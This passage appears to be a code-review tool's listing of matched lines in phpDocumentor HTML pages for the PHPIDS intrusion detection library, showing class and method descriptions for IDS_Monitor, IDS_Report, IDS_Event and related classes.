388-<p class="description"><p>For the sake of correctness of a singleton pattern, this is necessary</p></p>
389-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:5 (40/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Monitor</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:24 (41/257) OK | Dubious | Bad | Hide 
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">Monitoring engine</p>
26-<p class="description"><p>This class represents the core of the frameworks attack detection mechanism  and provides functions to scan incoming data for malicious appearing script  fragments.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:158 (42/257) OK | Dubious | Bad | Hide 
155-							
156-					</div>
157-		<div class="info-box-body">
158:			<a name="var$scanKeys" id="$scanKeys"><!-- --></A>
159-<div class="oddrow">
160-
161-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:169 (43/257) OK | Dubious | Bad | Hide 
166-		</span>
167-	</div>
168-
169:	<!-- ========== Info from phpDoc block ========= -->
170-<p class="short-description">Scan keys switch</p>
171-<p class="description"><p>Enabling this property will cause the monitor to scan both the key and  the value of variables</p></p>
172-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:197 (44/257) OK | Dubious | Bad | Hide 
194-		<div class="info-box-body">
195-			<A NAME='method_detail'></A>
196-
197:<a name="method__construct" id="__construct"><!-- --></a>
198-<div class="evenrow">
199-	
200-	<div class="method-header">
201-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">175</span>)
202-	</div> 
203-	
204:	<!-- ========== Info from phpDoc block ========= -->
205-<p class="short-description">Constructor</p>
206-	<ul class="tags">
207-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:232 (45/257) OK | Dubious | Bad | Hide 
229-		
230-			
231-	</div>
232:<a name="methodaddHtml" id="addHtml"><!-- --></a>
233-<div class="oddrow">
234-	
235-	<div class="method-header">
236-		<span class="method-title">addHtml</span> (line <span class="line-number">589</span>)
237-	</div> 
238-	
239:	<!-- ========== Info from phpDoc block ========= -->
240-<p class="short-description">Adds a value to the html array</p>
241-	<ul class="tags">
242-				<li><span class="field">since:</span> 0.5</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:262 (46/257) OK | Dubious | Bad | Hide 
259-		
260-			
261-	</div>
262:<a name="methodaddJson" id="addJson"><!-- --></a>
263-<div class="evenrow">
264-	
265-	<div class="method-header">
266-		<span class="method-title">addJson</span> (line <span class="line-number">630</span>)
267-	</div> 
268-	
269:	<!-- ========== Info from phpDoc block ========= -->
270-<p class="short-description">Adds a value to the json array</p>
271-	<ul class="tags">
272-				<li><span class="field">since:</span> 0.5.3</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:292 (47/257) OK | Dubious | Bad | Hide 
289-		
290-			
291-	</div>
292:<a name="methodgetExceptions" id="getExceptions"><!-- --></a>
293-<div class="oddrow">
294-	
295-	<div class="method-header">
296-		<span class="method-title">getExceptions</span> (line <span class="line-number">560</span>)
297-	</div> 
298-	
299:	<!-- ========== Info from phpDoc block ========= -->
300-<p class="short-description">Returns exception array</p>
301-	<ul class="tags">
302-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:316 (48/257) OK | Dubious | Bad | Hide 
313-		
314-			
315-	</div>
316:<a name="methodgetHtml" id="getHtml"><!-- --></a>
317-<div class="evenrow">
318-	
319-	<div class="method-header">
320-		<span class="method-title">getHtml</span> (line <span class="line-number">601</span>)
321-	</div> 
322-	
323:	<!-- ========== Info from phpDoc block ========= -->
324-<p class="short-description">Returns html array</p>
325-	<ul class="tags">
326-				<li><span class="field">return:</span> the fields that contain allowed html</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:342 (49/257) OK | Dubious | Bad | Hide 
339-		
340-			
341-	</div>
342:<a name="methodgetJson" id="getJson"><!-- --></a>
343-<div class="oddrow">
344-	
345-	<div class="method-header">
346-		<span class="method-title">getJson</span> (line <span class="line-number">642</span>)
347-	</div> 
348-	
349:	<!-- ========== Info from phpDoc block ========= -->
350-<p class="short-description">Returns json array</p>
351-	<ul class="tags">
352-				<li><span class="field">return:</span> the fields that contain json</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:368 (50/257) OK | Dubious | Bad | Hide 
365-		
366-			
367-	</div>
368:<a name="methodgetReport" id="getReport"><!-- --></a>
369-<div class="evenrow">
370-	
371-	<div class="method-header">
372-		<span class="method-title">getReport</span> (line <span class="line-number">664</span>)
373-	</div> 
374-	
375:	<!-- ========== Info from phpDoc block ========= -->
376-<p class="short-description">Returns report object providing various functions to work with  detected results. Also the centrifuge data is being set as property  of the report object.</p>
377-	<ul class="tags">
378-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:392 (51/257) OK | Dubious | Bad | Hide 
389-		
390-			
391-	</div>
392:<a name="methodgetStorage" id="getStorage"><!-- --></a>
393-<div class="oddrow">
394-	
395-	<div class="method-header">
396-		<span class="method-title">getStorage</span> (line <span class="line-number">652</span>)
397-	</div> 
398-	
399:	<!-- ========== Info from phpDoc block ========= -->
400-<p class="short-description">Returns storage container</p>
401-	<ul class="tags">
402-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:416 (52/257) OK | Dubious | Bad | Hide 
413-		
414-			
415-	</div>
416:<a name="methodrun" id="run"><!-- --></a>
417-<div class="evenrow">
418-	
419-	<div class="method-header">
420-		<span class="method-title">run</span> (line <span class="line-number">233</span>)
421-	</div> 
422-	
423:	<!-- ========== Info from phpDoc block ========= -->
424-<p class="short-description">Starts the scan mechanism</p>
425-	<ul class="tags">
426-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:440 (53/257) OK | Dubious | Bad | Hide 
437-		
438-			
439-	</div>
440:<a name="methodsetExceptions" id="setExceptions"><!-- --></a>
441-<div class="oddrow">
442-	
443-	<div class="method-header">
444-		<span class="method-title">setExceptions</span> (line <span class="line-number">546</span>)
445-	</div> 
446-	
447:	<!-- ========== Info from phpDoc block ========= -->
448-<p class="short-description">Sets exception array</p>
449-	<ul class="tags">
450-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:469 (54/257) OK | Dubious | Bad | Hide 
466-		
467-			
468-	</div>
469:<a name="methodsetHtml" id="setHtml"><!-- --></a>
470-<div class="evenrow">
471-	
472-	<div class="method-header">
473-		<span class="method-title">setHtml</span> (line <span class="line-number">573</span>)
474-	</div> 
475-	
476:	<!-- ========== Info from phpDoc block ========= -->
477-<p class="short-description">Sets html array</p>
478-	<ul class="tags">
479-				<li><span class="field">since:</span> 0.5</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:499 (55/257) OK | Dubious | Bad | Hide 
496-		
497-			
498-	</div>
499:<a name="methodsetJson" id="setJson"><!-- --></a>
500-<div class="oddrow">
501-	
502-	<div class="method-header">
503-		<span class="method-title">setJson</span> (line <span class="line-number">614</span>)
504-	</div> 
505-	
506:	<!-- ========== Info from phpDoc block ========= -->
507-<p class="short-description">Sets json array</p>
508-	<ul class="tags">
509-				<li><span class="field">since:</span> 0.5.3</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:5 (56/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Report</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:29 (57/257) OK | Dubious | Bad | Hide 
26-            <ul>
27-                <li>Countable (internal interface)</li><li>IteratorAggregate (internal interface)</li>            </ul>
28-        </p>
29:        		<!-- ========== Info from phpDoc block ========= -->
30-<p class="short-description">PHPIDS report object</p>
31-<p class="description"><p>The report objects collects a number of events and thereby presents the  detected results. It provides a convenient API to work with the results.</p><p>Note that this class implements Countable, IteratorAggregate and  a __toString() method</p></p>
32-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:180 (58/257) OK | Dubious | Bad | Hide 
177-							
178-					</div>
179-		<div class="info-box-body">
180:			<a name="var$centrifuge" id="$centrifuge"><!-- --></A>
181-<div class="oddrow">
182-
183-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:191 (59/257) OK | Dubious | Bad | Hide 
188-		</span>
189-	</div>
190-
191:	<!-- ========== Info from phpDoc block ========= -->
192-<p class="short-description">Centrifuge data</p>
193-<p class="description"><p>This variable - initiated as an empty array - carries all information  about the centrifuge data if available</p></p>
194-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:203 (60/257) OK | Dubious | Bad | Hide 
200-		
201-
202-</div>
203:<a name="var$events" id="$events"><!-- --></A>
204-<div class="evenrow">
205-
206-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:214 (61/257) OK | Dubious | Bad | Hide 
211-		</span>
212-	</div>
213-
214:	<!-- ========== Info from phpDoc block ========= -->
215-<p class="short-description">Event container</p>
216-	<ul class="tags">
217-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:225 (62/257) OK | Dubious | Bad | Hide 
222-		
223-
224-</div>
225:<a name="var$impact" id="$impact"><!-- --></A>
226-<div class="oddrow">
227-
228-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:236 (63/257) OK | Dubious | Bad | Hide 
233-		</span>
234-	</div>
235-
236:	<!-- ========== Info from phpDoc block ========= -->
237-<p class="short-description">Impact level</p>
238-<p class="description"><p>The impact level is calculated on demand by adding the results of the  event objects on IDS_Report-&gt;getImpact()</p></p>
239-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:248 (64/257) OK | Dubious | Bad | Hide 
245-		
246-
247-</div>
248:<a name="var$tags" id="$tags"><!-- --></A>
249-<div class="evenrow">
250-
251-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:259 (65/257) OK | Dubious | Bad | Hide 
256-		</span>
257-	</div>
258-
259:	<!-- ========== Info from phpDoc block ========= -->
260-<p class="short-description">List of affected tags</p>
261-<p class="description"><p>This list of tags is collected from the collected event objects on  demand when IDS_Report-&gt;getTags() is called</p></p>
262-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:287 (66/257) OK | Dubious | Bad | Hide 
284-		<div class="info-box-body">
285-			<A NAME='method_detail'></A>
286-
287:<a name="method__construct" id="__construct"><!-- --></a>
288-<div class="oddrow">
289-	
290-	<div class="method-header">
291-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">100</span>)
292-	</div> 
293-	
294:	<!-- ========== Info from phpDoc block ========= -->
295-<p class="short-description">Constructor</p>
296-	<ul class="tags">
297-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:316 (67/257) OK | Dubious | Bad | Hide 
313-		
314-			
315-	</div>
316:<a name="methodaddEvent" id="addEvent"><!-- --></a>
317-<div class="evenrow">
318-	
319-	<div class="method-header">
320-		<span class="method-title">addEvent</span> (line <span class="line-number">116</span>)
321-	</div> 
322-	
323:	<!-- ========== Info from phpDoc block ========= -->
324-<p class="short-description">Adds an IDS_Event object to the report</p>
325-	<ul class="tags">
326-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:345 (68/257) OK | Dubious | Bad | Hide 
342-		
343-			
344-	</div>
345:<a name="methodclear" id="clear"><!-- --></a>
346-<div class="oddrow">
347-	
348-	<div class="method-header">
349-		<span class="method-title">clear</span> (line <span class="line-number">248</span>)
350-	</div> 
351-	
352:	<!-- ========== Info from phpDoc block ========= -->
353-<p class="short-description">Clears calculated/collected values</p>
354-	<ul class="tags">
355-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:369 (69/257) OK | Dubious | Bad | Hide 
366-		
367-			
368-	</div>
369:<a name="methodcount" id="count"><!-- --></a>
370-<div class="evenrow">
371-	
372-	<div class="method-header">
373-		<span class="method-title">count</span> (line <span class="line-number">214</span>)
374-	</div> 
375-	
376:	<!-- ========== Info from phpDoc block ========= -->
377-<p class="short-description">Returns total amount of events</p>
378-	<ul class="tags">
379-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:398 (70/257) OK | Dubious | Bad | Hide 
395-					</dl>
396-			
397-	</div>
398:<a name="methodgetCentrifuge" id="getCentrifuge"><!-- --></a>
399-<div class="oddrow">
400-	
401-	<div class="method-header">
402-		<span class="method-title">getCentrifuge</span> (line <span class="line-number">260</span>)
403-	</div> 
404-	
405:	<!-- ========== Info from phpDoc block ========= -->
406-<p class="short-description">This method returns the centrifuge property or null if not  filled with data</p>
407-	<ul class="tags">
408-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:422 (71/257) OK | Dubious | Bad | Hide 
419-		
420-			
421-	</div>
422:<a name="methodgetEvent" id="getEvent"><!-- --></a>
423-<div class="evenrow">
424-	
425-	<div class="method-header">
426-		<span class="method-title">getEvent</span> (line <span class="line-number">135</span>)
427-	</div> 
428-	
429:	<!-- ========== Info from phpDoc block ========= -->
430-<p class="short-description">Get event by name</p>
431-<p class="description"><p>In most cases an event is identified by the key of the variable that  contained maliciously appearing content</p></p>
432-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:454 (72/257) OK | Dubious | Bad | Hide 
451-		
452-			
453-	</div>
454:<a name="methodgetImpact" id="getImpact"><!-- --></a>
455-<div class="oddrow">
456-	
457-	<div class="method-header">
458-		<span class="method-title">getImpact</span> (line <span class="line-number">179</span>)
459-	</div> 
460-	
461:	<!-- ========== Info from phpDoc block ========= -->
462-<p class="short-description">Returns total impact</p>
463-<p class="description"><p>Each stored IDS_Event object and its IDS_Filter sub-object are called  to calculate the overall impact level of this request</p></p>
464-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:479 (73/257) OK | Dubious | Bad | Hide 
476-		
477-			
478-	</div>
479:<a name="methodgetIterator" id="getIterator"><!-- --></a>
480-<div class="evenrow">
481-	
482-	<div class="method-header">
483-		<span class="method-title">getIterator</span> (line <span class="line-number">228</span>)
484-	</div> 
485-	
486:	<!-- ========== Info from phpDoc block ========= -->
487-<p class="short-description">Return iterator object</p>
488-<p class="description"><p>In order to provide the possibility to directly iterate over the  IDS_Event object the IteratorAggregate is implemented. One can easily  use foreach() to iterate through all stored IDS_Event objects.</p></p>
489-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:509 (74/257) OK | Dubious | Bad | Hide 
506-					</dl>
507-			
508-	</div>
509:<a name="methodgetTags" id="getTags"><!-- --></a>
510-<div class="oddrow">
511-	
512-	<div class="method-header">
513-		<span class="method-title">getTags</span> (line <span class="line-number">155</span>)
514-	</div> 
515-	
516:	<!-- ========== Info from phpDoc block ========= -->
517-<p class="short-description">Returns list of affected tags</p>
518-	<ul class="tags">
519-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:533 (75/257) OK | Dubious | Bad | Hide 
530-		
531-			
532-	</div>
533:<a name="methodhasEvent" id="hasEvent"><!-- --></a>
534-<div class="evenrow">
535-	
536-	<div class="method-header">
537-		<span class="method-title">hasEvent</span> (line <span class="line-number">200</span>)
538-	</div> 
539-	
540:	<!-- ========== Info from phpDoc block ========= -->
541-<p class="short-description">Checks if a specific event with given name exists</p>
542-	<ul class="tags">
543-				<li><span class="field">throws:</span> InvalidArgumentException if argument is illegal</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:563 (76/257) OK | Dubious | Bad | Hide 
560-		
561-			
562-	</div>
563:<a name="methodisEmpty" id="isEmpty"><!-- --></a>
564-<div class="oddrow">
565-	
566-	<div class="method-header">
567-		<span class="method-title">isEmpty</span> (line <span class="line-number">238</span>)
568-	</div> 
569-	
570:	<!-- ========== Info from phpDoc block ========= -->
571-<p class="short-description">Checks if any events are registered</p>
572-	<ul class="tags">
573-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:587 (77/257) OK | Dubious | Bad | Hide 
584-		
585-			
586-	</div>
587:<a name="methodsetCentrifuge" id="setCentrifuge"><!-- --></a>
588-<div class="evenrow">
589-	
590-	<div class="method-header">
591-		<span class="method-title">setCentrifuge</span> (line <span class="line-number">275</span>)
592-	</div> 
593-	
594:	<!-- ========== Info from phpDoc block ========= -->
595-<p class="short-description">This method sets the centrifuge property</p>
596-	<ul class="tags">
597-				<li><span class="field">return:</span> true is arguments were valid</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:618 (78/257) OK | Dubious | Bad | Hide 
615-		
616-			
617-	</div>
618:<a name="method__toString" id="__toString"><!-- --></a>
619-<div class="oddrow">
620-	
621-	<div class="method-header">
622-		<span class="method-title">__toString</span> (line <span class="line-number">289</span>)
623-	</div> 
624-	
625:	<!-- ========== Info from phpDoc block ========= -->
626-<p class="short-description">Directly outputs all available information</p>
627-	<ul class="tags">
628-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---File.php.html:5 (79/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page File.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---File.php.html:23 (80/257) OK | Dubious | Bad | Hide 
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---File.php.html:72 (81/257) OK | Dubious | Bad | Hide 
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Caching/Interface_php"><!-- --></a>
73-<div class="oddrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---File.php.html:83 (82/257) OK | Dubious | Bad | Hide 
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:5 (83/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_Database</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:28 (84/257) OK | Dubious | Bad | Hide 
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Log_Interface.html">IDS_Log_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">Database logging wrapper</p>
30-<p class="description"><p>The database wrapper is designed to store reports into an sql database. It  implements the singleton pattern and is based in PDO, supporting  different database types.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:93 (85/257) OK | Dubious | Bad | Hide 
90-		</div>
91-		<div class="info-box-body">
92-			<A NAME='method_detail'></A>
93:<a name="methodgetInstance" id="getInstance"><!-- --></a>
94-<div class="evenrow">
95-	
96-	<div class="method-header">
97-		<span class="method-title">static method getInstance</span> (line <span class="line-number">212</span>)
98-	</div> 
99-	
100:	<!-- ========== Info from phpDoc block ========= -->
101-<p class="short-description">Returns an instance of this class</p>
102-<p class="description"><p>This method allows the passed argument to be either an instance of IDS_Init or  an array.</p></p>
103-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:125 (86/257) OK | Dubious | Bad | Hide 
122-			
123-	</div>
124-
125:<a name="method__construct" id="__construct"><!-- --></a>
126-<div class="oddrow">
127-	
128-	<div class="method-header">
129-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">146</span>)
130-	</div> 
131-	
132:	<!-- ========== Info from phpDoc block ========= -->
133-<p class="short-description">Constructor</p>
134-<p class="description"><p>Prepares the SQL statement</p></p>
135-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:155 (87/257) OK | Dubious | Bad | Hide 
152-		
153-			
154-	</div>
155:<a name="methodexecute" id="execute"><!-- --></a>
156-<div class="evenrow">
157-	
158-	<div class="method-header">
159-		<span class="method-title">execute</span> (line <span class="line-number">246</span>)
160-	</div> 
161-	
162:	<!-- ========== Info from phpDoc block ========= -->
163-<p class="short-description">Stores given data into the database</p>
164-	<ul class="tags">
165-				<li><span class="field">throws:</span> Exception if db error occurred</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:5 (88/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Event</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:29 (89/257) OK | Dubious | Bad | Hide 
26-            <ul>
27-                <li>Countable (internal interface)</li><li>IteratorAggregate (internal interface)</li>            </ul>
28-        </p>
29:        		<!-- ========== Info from phpDoc block ========= -->
30-<p class="short-description">PHPIDS event object</p>
31-<p class="description"><p>This class represents a certain event that occured while applying the filters  to the supplied data. It aggregates a bunch of IDS_Filter implementations and  is a assembled in IDS_Report.</p><p>Note that this class implements both Countable and IteratorAggregate</p></p>
32-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:159 (90/257) OK | Dubious | Bad | Hide 
156-							
157-					</div>
158-		<div class="info-box-body">
159:			<a name="var$filters" id="$filters"><!-- --></A>
160-<div class="evenrow">
161-
162-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:170 (91/257) OK | Dubious | Bad | Hide 
167-		</span>
168-	</div>
169-
170:	<!-- ========== Info from phpDoc block ========= -->
171-<p class="short-description">List of filter objects</p>
172-<p class="description"><p>Filter objects in this array are those that matched the events value</p></p>
173-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:182 (92/257) OK | Dubious | Bad | Hide 
179-		
180-
181-</div>
182:<a name="var$impact" id="$impact"><!-- --></A>
183-<div class="oddrow">
184-
185-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:193 (93/257) OK | Dubious | Bad | Hide 
190-		</span>
191-	</div>
192-
193:	<!-- ========== Info from phpDoc block ========= -->
194-<p class="short-description">Calculated impact</p>
195-<p class="description"><p>Total impact of the event</p></p>
196-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:205 (94/257) OK | Dubious | Bad | Hide 
202-		
203-
204-</div>
205:<a name="var$name" id="$name"><!-- --></A>
206-<div class="evenrow">
207-
208-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:216 (95/257) OK | Dubious | Bad | Hide 
213-		</span>
214-	</div>
215-
216:	<!-- ========== Info from phpDoc block ========= -->
217-<p class="short-description">Event name</p>
218-	<ul class="tags">
219-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:227 (96/257) OK | Dubious | Bad | Hide 
224-		
225-
226-</div>
227:<a name="var$tags" id="$tags"><!-- --></A>
228-<div class="oddrow">
229-
230-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:238 (97/257) OK | Dubious | Bad | Hide 
235-		</span>
236-	</div>
237-
238:	<!-- ========== Info from phpDoc block ========= -->
239-<p class="short-description">Affecte tags</p>
240-	<ul class="tags">
241-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:249 (98/257) OK | Dubious | Bad | Hide 
246-		
247-
248-</div>
249:<a name="var$value" id="$value"><!-- --></A>
250-<div class="evenrow">
251-
252-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:260 (99/257) OK | Dubious | Bad | Hide 
257-		</span>
258-	</div>
259-
260:	<!-- ========== Info from phpDoc block ========= -->
261-<p class="short-description">Value of the event</p>
262-	<ul class="tags">
263-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:287 (100/257) OK | Dubious | Bad | Hide 
284-		<div class="info-box-body">
285-			<A NAME='method_detail'></A>
286-
287:<a name="method__construct" id="__construct"><!-- --></a>
288-<div class="oddrow">
289-	
290-	<div class="method-header">
291-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">106</span>)
292-	</div> 
293-	
294:	<!-- ========== Info from phpDoc block ========= -->
295-<p class="short-description">Constructor</p>
296-<p class="description"><p>Fills event properties</p></p>
297-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:323 (101/257) OK | Dubious | Bad | Hide 
320-		
321-			
322-	</div>
323:<a name="methodcount" id="count"><!-- --></a>
324-<div class="evenrow">
325-	
326-	<div class="method-header">
327-		<span class="method-title">count</span> (line <span class="line-number">211</span>)
328-	</div> 
329-	
330:	<!-- ========== Info from phpDoc block ========= -->
331-<p class="short-description">Returns number of filters</p>
332-<p class="description"><p>To implement interface Countable this returns the number of filters  appended.</p></p>
333-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:353 (102/257) OK | Dubious | Bad | Hide 
350-					</dl>
351-			
352-	</div>
353:<a name="methodgetFilters" id="getFilters"><!-- --></a>
354-<div class="oddrow">
355-	
